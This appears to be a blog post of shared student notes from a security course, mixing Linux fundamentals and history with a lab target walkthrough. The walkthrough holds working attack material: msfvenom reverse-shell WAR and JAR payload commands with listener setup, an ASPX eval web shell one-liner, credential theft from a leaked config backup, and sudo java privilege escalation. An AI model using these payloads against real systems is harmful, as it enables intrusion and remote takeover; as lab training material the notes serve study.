E-第三周笔记分享

第三周
陈欣阳
Burp

    1. burp基于java 
    2. burp CA证书

扫描工具有借助字典进行扫描 字典的全面性最终体现在扫描结果
kali内置
cmd-line 端口服务探测和端口漏洞扫描
dnsdist6 显示网站(有多少域 子域 ) 扫描IP v4、6
Dig 可以用来判断dns问题/反向域名解析
dig -x ip @dnsserver #用 dig 查看反向解析

MSF
msfconsole
msfvenom -p java/jsp_shell_reverse_tcp LHOST=47.97.3.73 LPORT=8888 -f war > pipi1.war

启动handler模块作为主控端
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp(可以按两下tab来查找文件全称)
set lhost
set lport

用kali 可以通过虚拟机网络连接添加端口

一部分 根目录系统
文件系统 rootfs filesystem
/bin 二进制 存放命令
/boot 启动和内核
/dev 设备文件 (映射文件)
/etc 应用程序的配置文件
/home:普通用户目录,默认为/home/USERNAME
/lib和/lib64:系统开机时需要用的函数库及/bin和/sbin命令调用的函数

苏俊杰
ip地纸查看 :ifconfig
shell:人机交互接口
shell输入命令,shell把命令传递给内核,内核把结果反馈给shell,人从shell读取执行命令
内核:图形/字符界面 命令收取一样
linux支持:
bash 默认支持的shell
ksh:
csh
内核作用:进程:要执行的任务
文件系统:Windows:nyfs/fat32
linux:ext3 ext4 xfs等
内存管理
硬件驱动
安全功能
网络功能
linux设计思想
1:有很多的小程序组成,每个小程序完成单一的功能,实现复杂的任务 1: , (http务需要安装很多小组
2:一切皆文件:所有的外围设备(硬件)或者其他程序
3尽量避免捕获用户接口
4:配置文件保存为纯文本格式(可以用文本编辑器编辑vim)
Linux终端:多用户多任务系统
6个终端:ctrl+alt+f1-f6
Linux界面:
uI: graphical user interface:图形用户接口(图形界面)切换图形界面:ctrl+alt+7
cli: command line interface:命令行接口(字符界面)
命令格式等内容
命令提示符(prompt):[root@www#~]#

磁盘 虚拟机中 文件存在形式
宿主机—-虚拟机 通讯
虚拟机 -桥接模式 宿主机-物理网卡(ip地址相同)
虚拟机-nat模式(网络地址转化) 宿主机-vm8网卡 可以转换虚拟机IP地址与外界通讯

系统调用 system call

随着系统一起启动

不随系统一起启动的程序 :交互式应用程序(用户使用时根据需要启动程序)

操作系统:微软 linux(前身unix)
1969:mit bell:mutics(汇编语言)(被延迟)

ken:在pdp-7 用c语言开发系统unics—unix

1977:bell重新研究unix

1984年:谭宁邦教授 mini unix

1984 gnu(gcc/ bash shell)
开放软件和源码
任何人可以获取软件和源码
复制:复制该软件(衍生)
修改:该源码可自行修改

lgpl:基于某个内核平台开发的软件可以销售

托瓦兹 得到源码 unix-like
x386:
源码放到ftp上
虚拟团队诞生:1991年linux第一个版本诞生 linux0.0.2版本(内核版本号)
a.b.c
a主版本号
b次版本号(奇数时:开发版本
偶数:发行版本)

提示符(root@www~)
root用户名
www主机名

:当前目录是管理员

$:当前用户是普通用户

张嘉楠
提取靶机的flag1、2、3

Nmap -A -p- week3.404sec.com

发现IP为192.168.100.139端口为27689,登入网址192.168.100.139:27689发现需要账户密码
登录到burp扫描其中的文件,找到名为web.config,bak文件,在网页将其输入下载

再在Navicat里面登录数据库

找到其文目录中的UserLists找到账户

再重新刷新网站输入账号密码即可找到flag1

因为文件传输系统可以直接传txt文件,直接上传一个八位开头的aspx文件,内容:
<%@ Page Language=”Jscript”%><%eval(Request.Item[“自定义代码”],”unsafe”);%>

注:upfile和affix之间是\,不是/!!!!!!!

MSF渗透靶机

ping week2.404sec.com

Nmap -A -p 1-65535 week2.404sec.com

第三步、开启msf(kali自带msf)

msfconsole

然后打开Tomcat 输入上次爆破的密码

进入页面

回到虚拟机创建一个新的war LHOST是本机IP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.104 LPORT=8888 -f war > shell666.war

对刚刚的war进行部署

回到虚拟机执行监听会话

use exploit/multi/handler

set payload java/shell_reverse_tcp

show options

set lport 1234

set lhost 192.168.100.116 //阿里云外网IP

exploit

然后访问木马,监听栏会有回弹结果

然后输入whoami/shell,进入shell交互模式
查看ID
权限不足
查看版本(信息收集)

Ls -l //查看权限

  • rw- r— —- R:read W:write

sudo -l //使用sudo提权

可以发现java提权,再生成一个java的木马

msfvenom —platform java -f jar -p java/shell_reverse_tcp LHOST=192.168.100.116 LPORT=7777 -o payload.jar

set payload java/shell_reverse_tcp//创建一个新的会话

cp shell123.war /war/www/html/
cp payload.jar /war/www/html/

cd tmp
wget <网址>

sudo -u root java -jar payload.jar

cat flag

相关推荐

发表评论

路人甲

网友评论(0)